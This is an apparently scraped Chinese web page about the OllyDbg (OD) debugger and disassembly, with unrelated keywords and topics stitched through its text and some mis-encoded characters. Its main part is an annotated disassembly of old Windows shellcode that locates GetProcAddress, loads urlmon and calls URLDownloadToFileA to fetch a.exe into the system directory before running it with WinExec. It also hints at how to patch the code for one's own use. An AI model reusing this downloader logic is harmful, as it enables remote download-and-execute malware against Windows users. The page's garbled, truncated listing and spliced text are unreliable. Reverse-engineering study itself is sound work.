【神经猫源码】【caffeonspark源码分析】【python源码中国】od汇编源码

【神经猫源码】【caffeonspark源码分析】【python源码中国】od汇编源码_od 汇编

时间:2024-12-23 04:28:59 来源：翻书网页源码

1.od是汇编汇编什么
2.c语言怎样反汇编？
3.ODçä»ç»
4.如何快速读懂反汇编的汇编代码?

od汇编源码_od 汇编

od是什么

OD，软件名称，源码反汇编工具OD=OllyDebug，汇编汇编一个新的源码动态追踪工具，把IDA与SoftICE结合起来，汇编汇编Ring3级的源码神经猫源码调试器，已代替SoftICE成为当今最为流行的汇编汇编调试解密工具了。

同时还支持插件扩展功能，源码是汇编汇编最强大的调试工具。基本上，源码调试自己的汇编汇编程序因为有源码，一般用vc，源码破解别人的汇编汇编程序用OllyDebug。技能在《第三次生日》中，源码OD（OverDive）是汇编汇编阿雅获得的新能力。可以使用OD潜入战场上的caffeonspark源码分析士兵的潜意识，以及用来对付敌人（当敌人身上出现**三角符号时，即可使用△键发动OD对其实施致命一击，威力相当强命令od 命令用途：以指定格式显示文件。语法使用字符串类型显示文件，来格式化输出。od [ -v ] [ -A Addressbase ] [ -N Count ] [ -j Skip ] [ -t TypeString ... ] [ File ... ]使用标志显示文件，来格式化输出。od [ -a ] [ -b ] [ -c ] [ -C ] [ -d ] [ -D ] [ -e ] [ -f ] [ -F ] [ -h ] [ -H ] [ -i ] [ -I ] [ -l ] [ -L ] [ -o ] [ -O ] [ -p ] [ -P ] [ -s ] [ -v ] [ -x ] [ -X ] [ [ -S [ N ] ] [ -w [ N ] ] [ File ] [ [ + ] Offset [ . | b | B ] [ + ] Label [ . | b | B ] ]描述od 命令用指定格式显示由 File 参数指定的文件。

c语言怎样反汇编？

文件有两种，一种是文本文件，一种是程序二进制文件，不管哪种文件都可以用十六进制编码来显示，称为hex文件。

1、文本Hex文件一般不需要转成C语言，python源码中国更多的是程序二进制文件，用十六进制显示，可以转换成C语言，一般使用相应的反汇编程序来实现，这方面的工具很多，不同的平台略有不同。Windows平台一般常用的OllyDbg、Windbg、IDA，Linux平台使用最多的是GDB和Linux版的IDA。

OllyDbg，简称OD,一般是软件逆向工程爱好者，最先使用的一个工具，但是因为当下不在更新，所以一般用一般用于学习使用，后台统计源码下图中左上角的区域即为反汇编区域，用户可以根据汇编指令，分析程序算法，然后自己编写代码。

在Windows平台，特别是x平台，最好用的反汇编工具除还得是Windbg。将程序载入Windbg后，可以输入u命令来查看程序的反汇编代码。

2、对于编程人员来说，逆向分析是一个基本的技能，但是往往不容易入门，这里举一个例子。以一段早些年ShellCode的源码资本电话十六进制代码为例，代码如下图所示，这段不起眼的代码，实际上实现了一个下载者的功能。

拿到这样的十六进制代码，一般来说，先将其生成二进制文件，然后再分析其指令，通过反汇编指令再写出源码。只需要将上面的十六进制代码，保存到C语言的字符串数组中，写入到一个Exe的文件空段中，再修改指令将其跳转到程序入口处即可，这个过程类似于软件安全领域的壳。

将十六进制代码写入一个exe文件后，就可以将exe文件载入动态调试器进行动态分析或者使用静态反汇编程序进行静态分析，两者的不同在于动态调试器是要运行程序的，而静态反汇编分析不需要运行程序，所以一般恶意程序，都采用静态分析。反汇编开头的一段十六进制代码注释如下：

4AD 5A pop edx ; 函数返回的地址保存到edx中

4AD :A1 mov eax, dword ptr fs:[] ; 取peb

4AD 8B 0C mov eax, dword ptr [eax+C] ; peb_link

4ADB 8B 1C mov esi, dword ptr [eax+1C] ; 初始化列表到esi

4ADE AD lods dword ptr [esi] ; [esi]->eax + 8的位置即kernel.dll的地址

4ADF 8B mov eax, dword ptr [eax+8] ; eax=kernel.dll的地址

4AD 8BD8 mov ebx, eax ; ebx=kernel.dll的基址

4AD 8B 3C mov esi, dword ptr [ebx+3C] ; esi = pe头偏移

4AD 8BE mov esi, dword ptr [esi+ebx+] ; esi为kernel.dll导出表的偏移

4ADB F3 add esi, ebx ; esi = kernel.dll导出表的虚拟地址

4ADD 8B7E mov edi, dword ptr [esi+] ; edi=ent的偏移地址

4AD FB add edi, ebx ; edi = ent的虚拟地址

4AD 8B4E mov ecx, dword ptr [esi+] ; ecx = kernel.dll导出地址的个数

4AD ED xor ebp, ebp ; ebp=0

4AD push esi ; 保存导出表虚拟地址

4AD push edi ; 保存ent虚拟地址

4AD push ecx ; 保存计数

4ADA 8B3F mov edi, dword ptr [edi]

4ADC FB add edi, ebx ; 定位ent中的函数名

4ADE 8BF2 mov esi, edx ; esi为要查询的函数GetProcAddress即该call的下一个地址是数据

4AD 6A 0E push 0E ; 0xe0是GetProcAddress函数的字符个数

4AD pop ecx ; 设置循环次数为 0xe

4AD F3:A6 repe cmps byte ptr es:[edi], byte ptr [esi] ; ecx!=0&&zf=1 ecx=ecx-1 cmps判断 GetProcAddress

4AD je short 4ADF ; 如果ENT中的函数名为GetProcAddress跳走

4AD pop ecx ; 不相等则将导出地址数出栈

4AD 5F pop edi ; ent虚拟地址出栈

4AD C7 add edi, 4 ; edi地址递增4字节因为ENT的元素大小为4字节

4ADC inc ebp ; ebp用于保存ent中定位到GetProcAddress函数时的计数

4ADD ^ E2 E9 loopd short 4AD ; 循环查询

4ADF pop ecx

4AD 5F pop edi

4AD 5E pop esi

4AD 8BCD mov ecx, ebp ; 计数保存于ecx

4AD 8B mov eax, dword ptr [esi+] ; esi+0x Ordinal序号表偏移地址

4AD C3 add eax, ebx ; ordinal序号表的虚拟地址

4AD D1E1 shl ecx, 1 ; ecx逻辑增加2倍因为ordinal序号是WOR类型下面是通过add 来求ordinal所以这里必须扩大2倍

4ADB C1 add eax, ecx

4ADD C9 xor ecx, ecx ; ecx=0

4ADF :8B mov cx, word ptr [eax] ; 保存取出的ordinal序号

4AD 8B 1C mov eax, dword ptr [esi+1C] ; eax 为kenrnel.dll的EAT的偏移地址

4AD > C3 add eax, ebx ; eax = kernel.dll的eat虚拟地址

4AD C1E1 shl ecx, 2 ; 同上，扩大4倍因为eat中元素为DWORD值

4ADA C1 add eax, ecx

4ADC 8B mov eax, dword ptr [eax] ; eax即为GetProcAddress函数的地址相对虚拟地址，EAT中保存的RVA

4ADE C3 add eax, ebx ; 与基址相加求得GetProcAddress函数的虚拟地址

4AD 8BFA mov edi, edx ; GetProcAddress字符到edi

4AD 8BF7 mov esi, edi ; esi保存GetProcAddress地址

4AD C6 0E add esi, 0E ; esi指向GetProcAddress字符串的末地址

4AD 8BD0 mov edx, eax ; edx为GetProcAddress的地址

4AD 6A push 4

4ADB pop ecx ; ecx=4

有经验的程序员，通过分析即明白上面反汇编代码的主要目的就是获取GetProcAddress函数的地址。继续看反汇编代码：

4ADC E8 call 4ADE1 ; 设置IAT 得到4个函数的地址

4AD C6 0D add esi, 0D ; 从这里开始实现ShellCode的真正功能

4AD push edx

4AD push esi ; urlmon

4AD FF FC call dword ptr [edi-4] ; 调用LoadLibrarA来加载urlmon.dll

4AD 5A pop edx ; edx = GetProcAddress的地址

4ADA 8BD8 mov ebx, eax

4ADC 6A push 1

4ADE pop ecx

4ADF E8 3D call 4ADE1 ; 再次设置 IAT 得到URLDownLoadToFileA

4ADA4 C6 add esi, ; esi指向URLDownLoadToFileA的末地址

4ADA7 push esi

4ADA8 inc esi

4ADA9 E cmp byte ptr [esi], ; 判断esi是否为0x 这里在原码中有0x如果要自己用，应该加上一个字节用于表示程序结束

4ADAC ^ FA jnz short 4ADA8 ; 跨过这个跳转，需要在OD中CTRL+E修改数据为0x

4ADAE xor byte ptr [esi],

4ADB1 5E pop esi

4ADB2 EC sub esp, ; 开辟 byte栈空间

4ADB5 > 8BDC mov ebx, esp ; ebx为栈区的指针

4ADB7 6A push

4ADB9 push ebx

4ADBA FF EC call dword ptr [edi-] ; 调用GetSystemDirectoryA得到系统目录

4ADBD C 5CE mov dword ptr [ebx+eax], EC ; ebx+0x 系统路径占 0x个字节

4ADC4 C mov dword ptr [ebx+eax+4], ; 拼接下载后的文件路径%systemroot%\system\a.exe

4ADCC C0 xor eax, eax

4ADCE push eax

4ADCF push eax

4ADD0 push ebx

4ADD1 push esi

4ADD2 push eax

4ADD3 > FF FC call dword ptr [edi-4] ; URLDownLoadToFile下载文件为a.exe

4ADD6 8BDC mov ebx, esp

4ADD8 push eax

4ADD9 push ebx

4ADDA FF F0 call dword ptr [edi-] ; WinExec执行代码

4ADDD push eax

4ADDE FF F4 call dword ptr [edi-C] ; ExitThread退出线程

接下来的操作便是通过已获得地址的GetProcAddress()来分别得到GetSystemDirectory()、URLDownLoadToFile()、WinExec()及ExitProcess()函数的地址，并依次执行。到这里实际上有经验的程序员，马上就能写出C语言代码来。后面的数据区不在分析了，主要是介绍如何操作。

使用C语言，虽然知道了Hex文件的大致流程，但是一般来说，对于汇编指令，更倾向于直接使用asm关键字来使用内联汇编。如下图所示：

通过这个实例，相信应该能理解一个大致的流程啦。

ODçä»ç»

如何快速读懂反汇编的汇编代码?

理解反汇编代码的关键在于分析其逻辑结构和功能。初学者通常会遇到的问题是，即使能识别出汇编指令，却难以将它们组合成完整的意义。

学习使用操作代码的最佳途径是从破解程序（CrackMe）开始。这样可以减少不必要的干扰，更专注于代码的核心逻辑。

简化的CrackMe程序通常要求用户输入一个密钥，并提供反馈。密钥可能固定或基于输入数据生成，形式多样。

分析这类程序时，首先要识别关键代码，即程序的决策点或关键功能。通常，分析的第一步是找到程序中的关键代码段。

识别关键代码的方法包括观察程序流程中的分支点、循环或函数调用。这些部分通常包含程序的逻辑判断和关键功能。

理解反汇编代码的关键在于识别模式和上下文。例如，调用函数的指令、保护堆栈的操作、循环结构等都是常见的模式。

不同语言和编译器生成的代码有其特定的风格。识别这些模式有助于快速定位代码的关键部分。

熟悉基本的编程逻辑和操作码功能，如变量读写、函数调用和循环，对理解代码至关重要。同时，了解不同语言和编译器的代码特点也是有益的。